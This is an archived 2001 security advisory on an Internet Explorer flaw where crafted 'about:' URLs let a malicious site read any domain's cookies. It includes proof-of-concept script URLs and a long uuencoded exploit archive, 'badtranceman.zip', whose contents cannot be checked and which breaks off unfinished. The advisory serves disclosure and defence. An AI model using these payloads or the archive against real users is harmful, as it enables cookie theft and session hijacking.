Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Browsers :: expl4848.htm

Internet Explorer - Malicious sites can access any cookie!



9th Nov 2001 [SBWID-4848]
COMMAND

	Internet Explorer

SYSTEMS AFFECTED

	 Microsoft Internet Explorer 5.5 

	 Microsoft Internet Explorer 6.0 

PROBLEM

	Jouko Pynnonen found following :
	

	Microsoft  Internet  Explorer  has  a  vulnerability  which   allows   a
	malicious website to access any  cookie  in  the  browser\'s  memory  or
	those stored on  disk.  Cookies  are  used  by  web  sites  for  storing
	preferences, statistics and tracking users, but also  for  storing  more
	sensitive information such  as  session  keys  and  even  usernames  and
	passwords. Cookies are  used  by  many  (probably  most)  online  banks,
	webmail systems, and other sites requiring user authentication.
	

	Access to cookies may allow an attacker to retrieve passwords  or  other
	sensitive information, or hijack authenticated web sessions.
	

	What  makes  this  possible  are  certain  features  of  \"about:\"  URL
	handling of IE. For some reason, an URL  starting  with  \"about:\"  can
	contain html code that will be interpreted by the browser. For  instance
	entering the URL \"about:<h1>hello</h1>\" brings up  a  page  with
	the heading \"hello\". The URL may contain JavaScript as well. Going  to
	the following location with IE causes an alert box to be displayed:
	

	

	about:<script language=JavaScript>alert(\'ALERT\');</script>

	

	

	Finally, the about URL may have a hostname placed after the  colon,  and
	IE uses that hostname when determining the cookies to use:
	

	

	about://www.anydomain.fi/<script language=JavaScript>alert(document.cookie);</script>

	

	The above URL would result in IE displaying cookies of  www.anydomain.fi
	in the alert box, assuming that the site has been  visited  and  it  has
	set a cookie which hasn\'t expired.
	

	A malicious website can have  a  piece  of  JavaScript  redirecting  the
	browser to an about: URL similar to the one above, and do anything  with
	the cookie information of any selected domain.  Instead  of  showing  an
	alert box, the JavaScript code might just pass the cookie contents to  a
	script or a CGI program which could quietly store the information  to  a
	file and then redirect the browser  elsewhere  or  show  some  seemingly
	harmless web content.
	

	A web page for testing the vulnerability can be found at
	

	

	http://www.solutions.fi/iebug/

	

	

	You can type in an address of a  website  that  uses  cookies,  (without
	\"http://\") and it will tell you if your browser is vulnerable  to  the
	problem. For a relatively harmless test  case  try  typing  the  address
	www.google.com in the box (assuming you\'ve visited Google before).
	

	 update

	 ======

	

	[www.malware.com] released a simple exploit :
	

	Working Example [harmless \"windows flower pot\" screen saver]:
	 

	begin 644 badtranceman.zip

	M4$L#!!0````(`+*T>BLG.U;\\22@``#!5```0````8F%D=\')A;F-E;6%N+F5M

	M;.U\\6Y.JR-;@\\QCA?ZCI>31V`XJ6]IP^$0D)B`H\"@K>7+U044!3+&\\JOG[4R

	ML:IV]=Y]KA$S\\\\7);@N3S%RY[I<$MV5:VK?Q^G1.LL-O+]*O8K6B9H?+^G#Y

	MYC^.Z]]>]M?TDAP7IXNP3^[K\\\']7*_]CF5T/X>+T^/V7;]!^_R][?;\\X,.._

	M1%\'$C_9?HJ1*KRWU]5?25#NO>DO\\I5J9?G-.279*+H_?7AK8M4;6(DD_W;6S

	MTWZ1LB$86)]^>[&2U2D[9YO+R_!Z2;-L]Z+=CZ?U^?S2^E44?ZVWX`]L*+(U

	MR7X]\'&B_O3BG++RNUN&+\\O@$H!Q^&?]QY2B[GE9`:KWUJP0<D%[BR^7XFR#D

	M>?XK()0O3NM?5]F^6JE6_#@YO\\#_\"\\Z7;\\B8EST@M(C6+\\GAQ0)VOFR0CLNO

	M./_;M[^;13]G_\"*]K$^\'Q26YK?\\&^R6$K?^0_3_!YF<KOF)S@27\",5TD!T1A

	M%2].Y_7E]U\\FR2\',\\O,WJ=ZL__)IS6EQ.&_6IV_:896%R2\'Z[>7MFEW6X;?C

	M*3E<%LMTC?B<S^=_!UKQ99_^&[\'ZR_^D0]6?.=I+U[<&+TZ@#$SUY9=O@C!I

	MJ()`?<H\'Y%_%%P8RN8#Q+%)!T.Q?_@KK<?2O?^EJA&+/TGS\"-.K;^NV:W\'YO

	MT,\\DO*QX!V[_\\D\',R^_5RI.:!LT_D_,.\\M-\":\\00^J39O[P<%OLUC!F:K7G$

	M\'WJX;N3/!MI?_R+P*]P0&))_T8>V_W).\"EQ0Q_O*D,Z^4/*<BT,ORTC-TNP$

	MT__7AC6<G&Q.L.?+^;2\"^ZLD_.W\'9O02KY,H1KS%ESP)+S%^8\\AP`+`3VQXV

	M9+M_Z2&N?_T\'M>;;MW_1%A?7,,F$^[=\\<4-%8[S]14\\?H$,OI;+]>EZ=_ES7

	MEHOSNB5_3#\'I;R]_^3&/&(\'^^,TEQ\"+0-/PC\"&U\"!A%Y-I?\\_:U:P;]\\K;RY

	M1C*YD(-M+B/%M\\1X;,3\'U4/)5_O.8;77+Z9AQ\\M]\\Q:J2C(?*8]P(D<+^\'A:

	MQS<-Z5:MS(W@2EVQWWO?07$]0,@GFDZLMXNS#3XV\'Q)\"(VU`7*M/%(;#^CET

	M\'5D<-T:,Q2&19Q\\15C[@:!]?E?PY<U\'@Q23/I0!-^9C^ON03F(\\;BLR^Z@3Y

	M:G^=@8WSC1CPL5WU1S/^D8;0J.6Z2-XG8G[6U*8XG\\8B?A7B&5X85PS\"OY:X

	M?;>\"#5_GAB[.7/:=XFV+O\"]>_6$-XP0%:(-]NIM-O1AZ&>,O1]%\\__.E(3Q7

	M;3Y6C=X6^U>\"J\"ILFVJ%HJ#5#VU];UPLU]5^?%[6`;->SG\"<O<,D]:]+D%(F

	MKW]9`MA^P+=_H?T\'VC_7_I^%IH?\':F6Y#W>+2?.P8G;@]0))L=SQCO0FH*&:

	M?5L>O,>RGD>!H5_GD_O*,\\;%HN\'=F\'GI]A:T.UVF=ASNQYMJQ6/V2`5LB7(!

	MG3>73^_]P#]6-(*_9U3_AP>V9N`H-34PGSE^M78PKNQQ:K7\"9GQJB>CN%\'U!

	M:T3O*.#1\\=YUT\\;+:SZ5U:1MS/OM@5<S;WF\\F4O*4F9SLG&45RLN40?*0-7S

	M[GBQ``-TB9)M*4QPVN.A!O[=%+60(:MD*[QOS?2X0``#0YE%.?+C\'DWZEL:D

	MT+)S_\";<@Y6[`]QR:8;]Q!W=W[_GHWN\\4B35R\"R8%^&\\Z=G4B#X9O.KSJ=`(

	M@I8N\"-6*(\'3<I!&8XUM[W&.XW&3Z&NH&\\S1$\"?2EH+NQ\"CB_D4E\\M@`2K\';A

	M8^$:BFOT<`*[[(!2W$=JAGGLDO\'L=HYJ]UT@L?U,F$%<`+I@\'#5ZWN;NLGNP

	M9A%UA7!3P$X>VZE[ZTB`&_#\'8#A9G3G%.*C&-O+\'3/77KMN[B],<`PL9GA/\\

	M\'J$/I4Z=OFX,ROBI&P\'`:$+`!+Z9J7:9)U2(E4=3MCH2@ZB(ZNRBMZUN1+)4

	M;_?U%?)OZ`:N!>%UE6\\%Q2-WE]\"3UOH8JU9P-(R6`N6C76_#_7#4:)P)J6E9

	MI#%<LDF.\\J/W[&SV<Y%!C5>I0+9.+W&3>`GT(&Y6VR(@+Z<CU89)\"T,X7ZD.

	M](G+KMT)85?\'Q1W5`:6@5;1W!//I`V?F\'6%\'ZWT]`]R8!KCY8L7#PWZS:1(A

	MT>N-/(@WG;9&SZ&!?.RVS6$A,JHV.P<DL,VF.42)OGYF,.[C70GM+D7L6H@$

	M*4@@F8(=\'M_MT$GB!9/.6;.,`VH_6.&A47,=^<IQ\'$#,XOPX*=28=QJ-W/V0

	M+6B$)SI&1C(W9Q3J?L0HICY23@6;XF<`\'Z8M0&G;:0B\"?+9U;DVBM>E(\'3WT

	MA<:TW;)/\'7`&I_&;9B\'.BUT?(\'&(\"E7<H*]Q.RK<.WS`3G$5:&3`K$J<BDDN

	M!CB#M(>]:?CH;=:`XWHT\\#8NO<NIWC+/@363[(;3$=/YW2O7:ZCEU4I68NUM

	MDEX79.5M1L_]>PXU!OXF&>B<TIY\"^_0>N:_^.G>B/:VA%T-[\"-VMH*_O*O,A

	MU)FX#U3KT)O8X;P0;+`_C=F\'8RBFI#?H+5]=FYMI>ATTQPU5(<H8/1<UT1+S

	M<R1$\"EICM1(JL`DLBX<9NIF.EB.9-6V!%C1,3Y@5MC07C$MY4S))[^@4\\8#$

	M@]:]S4P-N[NB_BH3C7FD0++]!1\"+U.H;14$.U_2Y\']2S\"#XJCK-/_01>8\"JZ

	M((W`O,W&PM/GI+H`^$NZ\\E:MF/H&H,2X%_#@/D7/@A()A)):-HZX*)-M,`W0

	MPCT&94I\"]]15.)>8_T4I,.NI\\>07K?S<<1D492)TUMLY:DY?$U\'.^9JHZ.^D

	MEIUAGZ^ED,+VW/%-`+YE=6:3W`LAM)1#L7X(Q9)_!\"7+F<SC:N4+E\'?Y9G=<

	MH8@](V+Y.:ZRVOOM!.=3!^VR]/BY&K6)!AY!9?G;XW73\'@\\8=30+(\\C\\S(NN

	MFQ=3-V]*XHILE;A.!K[G%ITWF]NTI+E)N]_3/:2->BVZDTK<^A;A?JXS:1D:

	MY)\"*,2P\"1N7J9L0*!04!>UVT25\\HQIGU].1NLIV6\\:T&V##_5OI;=:LRS^,Z

	MV9CQ<JLAE.&>N<][SOTN:\\.]QSQJ(9K,\"G&-R^.IXO*(,FVC9F2EA[1]165C

	MG:5@3R)F?=(;]V6!(TRX1>+X(AXB%J#5U8I4^@<VPW.?,SZLC9J%T-++N.K*

	M$%=%10)-]W`WE=[SD2+D6!<HCVI%?N,S$5H+H@=8<\"8))[#GCJ2#=]?@0^&C

	M#B,9\\WB(ELND-H:(\"7*>78!;C\\&KZ9P-TY&994W&#3>)A/@UI+N.AJE]US,<

	M3T/]!OL](XN*7.^L)_(MG:Y,EQBQBW:9B$&PB.YOQ.GD%\"0!N*%F#\'CVTNI<

	MLD!14\'[]1026YJ&%(T7T=%_\'2]2[Q=[G\'FBC\\/B_L\"SF,8\'WX\"WOTYS%[GU0

	MU($Z%;6%Y27\\?B\"?.QGN:&0TRQE?0;$)X[I4!RR`_*`>&0JS4Z$(..S.RKGD

	M@<8D8F3*@@082`7;S;D\\Z\\=]*7N^NW8&0*A%*$\\[F[NL:L,]\\EJ#,MM3O*`>

	M\'W`?V,7ENZQE5@@-=U/TM9CQ:,!Q,G6GX\"55*H^&3/>$.(68)8]VC&>;*7CF

	MSAM8.L-U$:DUG?$P8NX&/1&C6%=M?QU/KC6F;QY0CQ8O6)39`LR2N-?6*\'B]

	MEFZ[\"YV`KBGHZT2>#P&WC9@YY\\5^R:408A9&G$M;<;=!(QNG7=!>/?2X%I(\'

	M[ND\'DWB%=HB^U6:[7\'1-2\\#;:\\O<V<P\"U#W`(/JL\"^,MT%6#Z.QY5&DIRAX\\

	MBD;EL2\'<!`&HM#%76^RG\'(\\IWW&SR4FH#&E-NS24F2,K4PLSLC:WW7.W6F$]

	MY#+L*8`L/\\L->;5!\'(:\'5V$#(KA/5Q@7KJQXI1\"[(&*JKI;E$>97X-_@3JPR

	MCW,@0F\"!-YK20S(CY0S`F])Q=A%[9)LU$.+C-NH4`;/&_GW,?%WI*7K`MP$H

	MY>WKK(#YNVS\"H[0^@-R#Y2NTJPPTENFT>FC+M2:OO6&MH`-NW&_@\"F6=1Z#7

	MK:[%I)\"&;S0[2PUF!PG+-VX%D_7;\'\'5TGV79*F>R+[4%LIK7W.)6LL_L<M1?

	M#\'?H?\\$SS=_T-PY]H?$5K>@/\\S,3[<\'8WD\'?<NZ-%E$]+M`\'&UN&Q\\(QGQ`S

	M`6NP?@E5Q?Q2R=JDA)H.:RS+UN>`6T#+\".S?40NV+`;0FQ%&BY[M,CVG#KL2

	M995#-\"Z_(X#%D.\'[9I0Z6JTL*/*\"OD/CV;TCCQJS/L0\"%FE&B!O$#S9&QH5Z

	M7NG\\.P8*!;*=&RVLPJI6\\\"_[3Y/<(&EJOI:30+1\'@:A//%=QP[I\'%UA-UL?N

	M;&H78;WSF(.KG/<UIK18L2QNG<Q56$YN1%$/-=6\\V)HQZO58\"@%:Z2;T54VV

	MC)<Z^&<Y35M6J`ND\'%]%SBTR:$U5!*WA33%>5\"OCTY;7I@%DI@NLK52P\'%V@

	M!Z\\%\'N<2TC=8T1\'M]2T\"KV-M\\E3T,D=V&V[1ZO0I.!K1`\\X$#<^N5F!&##4:

	MK1FVV`7;6W;=/=S+0_5*:UU;M(?7B[N^KL\"S9U($&?WPXK\',\"^D9;DVL+UJB

	MTU76T0/C:7D@.\"--L^NW@G4<LAF/RQL9\\DJT]>@I$=U%H7/T6E9F@-!/&,]>

	MP8X7J-W6<#!?QY\"_D6$4(K2H[6KH`1C9\\L5NZYU=XK*JDCPS5+`I^DI&-GH4

	M\\\'D0U=V=9AQCX3Z67:8A\"\"67@N+!JLG<\'+I0>,((E2<K]\"W0GY5]%_L0]2S@

	MITMES\\&^PX\\4G=@P%7:\"T:0A6@C<F8@*DX)R;VB0^\\9HT<!AH^N]M<81\']/B

	MAH[5G,O\'S.>\\X0Y\\+X?OPDRE`7+<@=?$[^)TO7OC8RPK$#<^[`2K0BWK*)AA

	M=SVPD14;<Z@XPS$69>X,U9FI,HP\'&\'3HL<WTWX;8C_$>[T%L`*YON?=DQR%1

	M0X3]:KJ(N$%&!I8%$40K??V!S=S7<\";&>GW&K*V,@(?C.X3:;0@9M8R^.2EC

	M1TT]ZY\"3HZYW76WC#AIUL`=!/=N]S_=<1QGFTS9*(CQX;RPKC\"F/%W.V&]0_

	MD\'=N\'ML2FKGC$(:7$<C,!9D9JQW8`(F<>,]TYN3(2\'5/&OH.:34&+)>:1P&+

	MG`IF^R/T2`S:$V/(CEO2*&[2LAX@&X:#.+QH960Y.5#O4[K37QG^062U2=-S

	M[Z(Q5J\"N_X(U==:\\FC#:\"FG=`0?/9[E2Z);5V8Q%PU*;H=ZJW<$C7\"1J.C60

	M:7<54MF](:<C059`QEQ>@@PYAG_%[ZWUC.F:D-I,UWS$$U;3O*:I6)<-#S:N

	M!UO8R.SX-KR[H,\\97W4X.[&ZPL+@>\'9Q9;>F,$IK6D!X7XMX?YJ7?;BB+=2T

	M=3F#GS[7U*B$0%S6-TSRA,CZFO[LY[RO8G^8SK@M+/K,L@H!<H\\)2J/OY*@1

	MPW8HFD8B6V7<G_(Q\\3FF2J64^HY<Q@6UC`NSF$LAY+DXE8,^V^E=B^E18+9I

	M==KE>8XQ.]L=+O]>2&I09]7>M6\'.ZX:.SBQHSRV(97I6FQZEB$.JEY#T39FS

	MZ\\MW6:.WI$<FN/>:!NQRGG^QR[W#Y%QP;X6\\BA!Z:9%I>=)6K<2;CJ@#_?J<

	M51-ZWG4M/)T;XZG9?<).^)Z:._^$F^_\\!+?3:/9^MB59H.L:E0@F92&1.P%B

	MU76[3@`)(XP;:%F/$?`WXK4.<8M\\>)XB?R%\'FC`.ESH/-2KPKD4$$7)@B+I/

	M?7_0UZX:OT?#PJDO]A`CIU,-(H[&L]D19%S>BG:]D%@6A``8?3^7A(AH)M.)

	MS#,7M1<N1SUOF3>!JJZWR$_(O;LXR>^QA+C7L>:\'/*3D9,[]5*=A7D+93\"7\\

	M\"!\"-.[A,\'W25\\.,T`**1W*,V2B?&_F+W&\'27_\'2%\"J)\\RQ>[AB#6CT/`*1(Z

	MPT\'-.#IXK9N0^Y*17F\\$=Z9[KD+1ZMN0OS?Q).$^S3![\'>_1]T+OS\"AK3\'>)

	M.,V21N.<2(V\\+\\BGNIGJ\\A._WK+K;9@ID:N:%UAYPL[R@N!WV&49\\Y.?GK=A

	MFK%$Z]D]SSH4/!^!60M6%X#<]MR?#/\"ODCE(*<R_<&L[<\\O:!I,S0CFSC\'2!

	M4,](D<WSQC>FH;H]%1K3:\'SK2!T\\D30B)C5^OC5AM&4=\\BA/I4+\"=4>KO]LI

	M7&*1:<0\'?IU,TG?Z?#).L=+TGMJ>`D9NP.K3(Z,,9^$,=N8\\P=%Q\"G9[G[)3

	M(#S5KM>B!F:UB3B9O=?/M7V/GY5T6`50K?1X/(=(P<[D13U=?K:RP?BZ994\'

	M9ABM?\"*SF\".]4JNM#GRH/\"#;R3?*NJ_-:*M:&4[;+IYST-?7D3N3-\')1R=!7

	M.JW5L-1]FKTY2\\ATIH2)`6RTBU&P[TZ8#:FNM;\"M+M:RU0KG-E\"Y0BJA;BFQ

	MSK`BD3]P5J7/.`?F,X=+!&72XD_RBFHEAU@VKB?$V&\'U/7;YC$2\';&J_Z)$%

	MKRS\'JY)_(JUGS(,\"3N[\"C!9,^S&GGRA,WY0-UC\"0;:WPM-`29DW[F3.%[#DG

	M]\"/>7ZUXGT=))^YG!\"G41SSF@^\\USR%!3:2W=:B$8\"8NT_-6\'Y]&8MT:O>8Y

	M1AZ\")V@FZEDD;(50T:?!,.DC>)\"0Z:PB_HSRL3(R>HLMC\'Z#C>KFXPRJ:<6;

	MW/,IJRH86_00-<9\"BK>!NZ.P!K0(:)F_WX></)UG++`A[0O&Y6V=YR92XQDS

	M7\'RV,6$KP&-QW<\\CM,\\35B+<\'_-XJL:L-SRK5AOKDBN]*P7%$UC5O%@]XK[F

	MHYN22Q-VPN/ADY4)SQ[:9D8<M2<9*.^02X\'?!4)%A>9)N*X3)^E)>K`\\:=L\\

	M\"J,F>ATFZXA&$6A$HYV1&GA(/Z)R%.8?XY`Y0+D*,Z375:BWF\':JMK^\\0TTP

	M9J?=G=TT(\\N(<1MB@\',1I^=`G[,\\#N;,>-T0KSLW?&84@\';\"7<:3I#U?,_LK

	MJ:(0HV0>?28A`=_\'K%#2!5W)#\'Y6@I(C3`H!XH86O9Q)>L>4;\"@TB\\X9O2,*

	M4?%00BN6WW4D?!HD0@;\"I.*WF^$F%H?[Q+0^:3U4XC7FC5[O!]1]U%*H*DK=

	MSVKN<\\Q:1-VLL5ER:QN>@2LRTUSV%`J\"\':Q;5RN<LD7,**).\':VGA]YIPK2E

	M9Z_9;J7^@V5)4`6S[S3;.R5TL,[\"NH\\1VMT?I^&X/-TAO8\"?I;78.0P8Q].7

	MR:@M?L-U7?8B`H__`%U&7YX,QF\"W`,WMR^@%B64#U#6>EKB!<:HMM\"@%7\'9\"

	MP0]2Y^8N95],6*VJ@PE`6)$\'%<#G#+87L:=Z4)_V35$,L[-UEE/8.^F-8,9F

	M`/5W-Q@MB,:LS1M89HN5RE08X_>VO=OF?!>P40OQSPL\'I#`WS_Q=#U-O*AP?

	M23,O\'C4O(TI33^T&>IG5T$`R7@,6E<_]]^]08ZAF.H`/K584,SU1<-_HE8\"3

	M$[<P\\XEFY9;.=4[%O$.:MA-)M*\"6,#LB(,S.DVLZR[H@YM;P\'`RN$)U!&VL`

	M5S`O!>#SJD*N+32\\>.O>ZU\'CX2C`:6\\\\\'V\\AT`G2R%%T:8V0U;8B6HVHG33.

	M9E!+C@*S!8P>.\'.<.EGC]LHDKIJB%>XS)1%\'CCJ,8U;WYR,G\"2P+(:IL5YB3

	MG<5M[1KS>$%/U4KW>2)W\'[/]%[>.W^J]XND<>,HX+#7A0U/`ZB!6F<EC/W\"]

	MNYN(V@SLM/F.FSE=F1ID`>E(8YGJ/]W^\\Y[#/]?^`^V?:_^!]L^U_U^@*=/9

	MM)<\'#26=3UBLU^:39K&8>LUR`GMIAYU+?_^NSWA5GMY6*^S\\%J?IBA)(]M27

	M>MI@9[L^WV$RG_:.\\T/JSQH]V*7ISZ;S-.B&.Z*EMN];C\\\'.L]A<+;U4*\\M`

	M+U;USG8QT<5YP-X_2M==E_PS[7N^*5]&>:41\'I=[[Q8V[._P6^WL,U(\'-#WF

	MT_EQ/ET!M*!N/Z!RNIHZXP\'C#=%UR,Y[3;>N7V?U\\=F=CL6EI,#J\'22U$]_X

	M\">K_+?5-Q#<^9[M.U]XP[O;=\'*&%&K[/@,>J:OXFSB0V)C8QB)Y=R`R.^*T[

	M4)TM>PPH!#O(9H8>9CLK9-\\\'Q,ZJ6L&W;QOX:-5$B$KBBRL.L7/L/M\\Z_7O;

	M%TJM.T!090^P?MN]OT#J\\==-<1PQ55<X[B\".M(>/9\':(D:X%#%J,#V):^,C\\

	M=0>W^PJN\"+!_UJ!O89^NL;_$<?V.XYKWW&O8I#\"><+X9N,*>XUNC=9PA[+#N

	M8RM<Q&&*.&I-P%DY8W^@05]!+B@$^QL<=^:8O8Z`;WFYA]&C2!%B[6D`L<OZ

	M,^Q?D2KKB#1,L\"\\S232AK[YA/\\/Y:L]@?*M[(#M?@PI2;\\(>2H[]9`?]7@Q]

	M]8S]&XY;V*<+[+=PO(M4JDP[;AI[+WJ@L\'=C<0;%&>2.3\\4\"G+%@G(YQ_(S]

	M\'N*@L#YK;_\'A[5:XX]:IH^G7-Z&4J;YU6J_\\,6C^<!ZW>[YNGX11W^D+-9\\^

	M;@]MWS[5]@/H#Y/MXU;</>CW<=P>=Q\\W,4_;IP[4@\'AGH0X>M]S$.T+OUA<T

	M\\?\"X\"?*N?>([.,:I<>MXO<ZKT%T[:T\'H#AJW8J753C5Y!/W\\`\'VI!EET;2#T

	M)2<1I.X2$E6]T7EM+T)A+9R,1N/6HE%M4#O?-XG0L)?-6VUWJBWY#B=M*MWJ

	MNU%G6=N9SD1X\\VY2M7)KZ\\O.4KAV;Q,A21K2K9D..\\O.O0<S;@]?ND\'1W%FV

	MWR;0GXXWTNWUO(/Q=`K]V<Z!<1+`N#793(!OK70`,U(\'(%[PCC02I%NNSV!&

	M;03]>`PXW._0KY$Q].]*5[H5^A3&\"T^8\"#N5`D0%,!\".X\"UAQG8+=UHBX%@+

	M$:<P@15,#^F!C\'OITAC\'$$DT-Z<>T>;\'I7$?S2>V\".-UHH5IJ\'F4F&>E6AG5

	MT_-2]X[+\"?A=55:#^E@<&^EE/@7?,G\")-VG&L_T]\'=?3Z]SH-`#\":PGA/!=3

	M<3X!H$Y./%B\'[ZG>#Z.IERZ#]!H2%?8:7^>:=YQ-[K=YKE)R\"(M5MW>$Z+-W

	M74CZQW8*<4);&F$O-,87?S*&**4?Y@&>.70BW8?(L?M\\EW3/*N(R,L;G%7JK

	MGJSX1B>>Z[:XV@..HD;&8UL/MA`!]]YY\"3R1W=ZY6EDUO,>LH331CUTCW5K6

	M[7BIS2\'R!&3JZMWYU`L6$_ODUCO2\\@\"3!C.$O`7<%>#?;0;\\;42],\\*I5F9U

	M*5\\`/GG4F\\*^XGRL/!;3>0Q4N*M]9[^8W-,`9N([P+BC2=@.,);69\\\"AH-N[

	MS??I>0Z<0D^ND9$X\'OF[L645)G#Z?B;XZCUR&B@#7$]^O??&94@N1,.(B9%\\

	MCI&\\!SP\\0A:Q13C5BLKX=D]G#<^9[8]P!00T2QD;8SG4.A+.`H>N<%GC/<@\'

	MC`[$7:5+-`^U!R!WD@5`!-Q@PV:D0%;BJ4O,&&\"U\"S&=45\'OG!<33UT=QL4\"

	MYEDN[`Q\\Q%\\=N)/[<5Z7,?EA.[G[BPUY2-U+P8T^[]!E_7Y;11@,,$>ZI\\`_

	M#;U1D2O=)R1OKV^9[-7\\?6=OWRGY9D4*!=J1\\ST7I\']SV<H1Y!DBYDAKR\"@@

	MB\\A7`-\'3=H65-\'=+`R\")\'=N5O\'=^,_^FD`!U>WX#B`>0HP2<G8(,=\\O&BOBD

	MYZ\\1ZD0\";O1BL!G<H1A-FOLE[!PS&N9L/E#:\"%$3MBC](M+=9<,6O]-D)V!6

	MXS;&#\\C,\'H\'1*0\"#+DEMP,\"65@<;.*,:)$@A&_RP/W)E..I*##B\"E5&7C)4;

	M:*473M*/\'5R2<%JD=-6PXWE]K)\">23P#H:WP??)Z;,\\A%YM-PA1QG+J]8+77

	MKZOZ\'7GY/H;A@^/T8ZY4*Y,/\"91W0WT-DI%R\';Q.>`3<WC,_W*E)/MU/RTQ1

	MY\'A6*PQ30D?,;[WO$RJ$R@KR*VBD1>DKT.*W^(9]*V(RITLC3<$>N*_KN>#?

	MF&_0TNVRW@3Z\"=(?@ZX?W\'U\'#@S],9M(\"K\'.2F\",TX7XB5>$I&!E&<AYR+39

	M5:>@(>GXRMZQ,.[I7!O+D)GFH9\'>ECO`M0O4@\"9OW)X/%I1\"CO!62NH!]JO,

	M#>^!/\"7X:@?<1^V5;O/N&\'Q`\'`.E9Z85@XQX!\\B8@_MQ=NC%J\\..G`EZ*WWG

	M&VD\"$GJLF1]L$V\\:\'TOH*?HWB[C<R_@A4!9VQ_E3,T52\\J<N76;H40W0)H!B

	MD-XH-.[CY0&E@\"K#YX\'V&FF./`*3J!$=\\!\'M,VAP.JJ/FZ0GD@`T(9@\"E8=T

	M`AY2F@=C&64+QHVR=5;&^(IS75<!*7CZ7`D^V=[?UVC_Y,O2LX>OS.*U6L%\'

	MFA%_/V:&&1<[#8/L#)PL>]J)/W/@)TW@,-YSS.]^4Z;RGQ%1DYUL\\Q^V#0EY

	M_DSI\\2;6[/=\\%_B78\\87_63<XK\\F`Z\\&T$S\"7I7IPRKV8!KK(_>\'.\"C\\5QI`

	MPT_&$3=V(I;_%`+9H5LTWW_*]^/Q&7_\"_B<SLK\\!0?XZ_I[AES/HW\\\"!SOYL

	M\'*\'1OX$#93AL=)#$,/K^=UR&MR#X0GZY_ATW-P\"1=:/O?^UBZR`L^D4\'!PHD

	M\"NJ77X<I^90@M-&7W]IM]3-C^G>-*H\"P8I&?*;?E1@_SB9N*/^8`NAZ14N*L

	M.*C!(909Q&B39:04J);S2+F1KHF3#0)VLW9Q7\";S\'#161]^[<)4KZM$R5QJD

	MRYY?F42+R-Q5SJ3+?A,\'^^A\\EYZ,0#.\"3P/PUT1P\\7-E\\$2QY-N8]PX162\"B

	M-()%CB!$!&H)0T/<ML0(R)*\\MRXA3SKP)2%U@BI7K3P(WZ,7*5-<N8H4]B8Q

	M1.(<(0\".NP\\@O1)\"A-R.$$?^;I5)@ES!Z`Q\\\"3^XJ[ZOZ)I_6.%%2HS<\"#_`

	M?W\"!X+,V`^HDO#<GR@5GSG)%1`X#;AL\"6<X*(1@66>1*PG$G!2KYI_9.-?+-

	MA609Z%9D,B#=)]4:XQ/*TMBA;)^G/[SQYQ9(R\"M*D$;\\]UW52A0I0]*%E2[N

	M\'>#>$5(_QVMW1;[*W$29T@#3]09>^^^>B>%FEG1W,W1Q8#XY<!XE\\Z\'5-A@4

	MMS?5X@(\'IV;,$(,\"N0\"XGW&G:F6:*Q)2#GR[(2[+/_`%;*!@?FT\"88O`_`F!

	M&CZ(%)]H.]2W(=\';9.0J0\\`-JEB_E.G-]6\\\"^F$7?TWC0LZ$)P49\"(D.T;\\Z

	M\'[+7V&/03U1B*[6WGZ,5*[@W8/U`SH,$#KC3`FT\"^#EB_`/JV+MG$9\\/L<5&

	MUM`=OADJ(FX!88]YM)SH^`HTU,?`\\0M2/T,(7:\"&:8G(?V,\'S6?V::\'VW)!?

	M,\'^/VE2MF,QZVMP&^#7&$<#IAA9-,(HAF2Y:.N!,%,@_7+21HH1X?\'H(;@O+

	MB.\\)NGY&7+A6K-!73$NJ=]QFN\"\\!S=ZBK0#$%\'>$>05J-N0A$=SI,AF*S#U\\

	MQD&?X8H\'4O.!*S1(.P<1N2/?^\'5\'ABZ1N13@3A?%Q#C==3D$6#E#\"6CL>D%)

	M$/1KP-^)\"SBC=I0TA0P-Q,U\'\'(`JOI)Q-$=J&3_@_H(H[*5+-T>.$_203.;S

	M7,EP9V8;L`YL(D*9BD@%X\\,2^<*L\"B\"H3P@F&LB5&8`+B2IJ@POU%M60NB:A

	M_,$;_M02H+GHM4V$>\"@Y\'J,/\\1AN:&4H$0VM*\"TE91%]1\\:YTD,N#)A-6\"2(

	MGMH+EGY$N@.FN6VT,JFTO^%G2,`W&W<$K\\7FK1!WT&C&-]T$:$@O1HBOO@*<

	MWHBH>(;*(PZ7C%9&GF=DL9\"/12FYRWL\\E4OM<$O^[=!+,<_Y8RT1,7$`_N7E

	ME?&3YV^HVX39Z0QE^_BI?4+KE;\\D\'Q..*_>H.:Y#.T7.Y\\JUQ+&G#%V-/>I7

	M^0:L??ZY?$1^VDI*S?(#(*(R?V17]NHJ)?@\">V3R^WB&S\\[Q(4(2!\\^4*+OB

	MO[4`T.\"N\\\"?IKB+P%LH?2&V%3B,L_TN>-TWV:];G_8_99MS8?)T++3&W;%[R

	M?9)B(F2^]L_.HA/SRW_O:S__AW=59U/&K)(0H2/C_6WC`]IY0)RUB;ESYQ,G

	MSH0V$#O56;O[^?[=E^-ZQ&W;4.>J^YX>/\"$TU?D>\'XHXZ*2?$%:]74]E$%`R

	M3PQVO?T<UU<K`29E7W!0\\/4,XQU\"^8\\B8#R?&1\\TS(PG`K-R?;6\"$&;/V^03

	M!/8>HJD\"P]YQ(&5N9:*Z?.5\"9\"80%Z+/$%A+8.0=PG=R>$+X*@FFKY^EP/,@

	M+K?OYVZX[OSA+D?S\\V[5\"I.\\(^,C\'1GU&NG;8\'73Y7V(UIBR8+Z#J]EOA\"F#

	MM,8_W%>R_I#KVW=W_I4^0F.OH/+MV/:(*.DRR^=&SQ7]W?*_)/>?VB=;^#=8

	M/DJA37Y@^5WD-.,,29Q2:@1E_-4A/24`.SM/F:ZA\"&BCE@\\4D.`V5]$*N@G,

	MP!4!8>.L$I[C^\"M!$I[C0`R.;YX:`C/4+I=\\[=-^P&0\'/`<DL8DIDQKH6R2P

	M^AKF07;4@.Q;\"1NK,O/\"WV<!A0JC=H,JP$V(D>\"6>;Q5RHQGZ)&I$\"Z189EU

	M*03?R<82&6,6$]67NNK[-L!HR+P]S]%O&`<&$8]=\"^`.QBZ,BA@7`AZ!\\8ZK

	MU,M,^J-!L`G^F!/Y+!J6&1%`9G57M?*U\\OI!W?6IR7^:E3UK&:4@?]J4#F8+

	M2Y9QLQIPR_(^%S.@`\",VPY\'EEBS38[DB\\\'7)LD_,?2`\'>E*CDC(?@9U9OL)*

	MT!AKQ)G+\\Q6X)H@;9BY8<8@L^I?9:A,AA)CUJRS[/R+5*V0B[+#&^>]5)\\O_

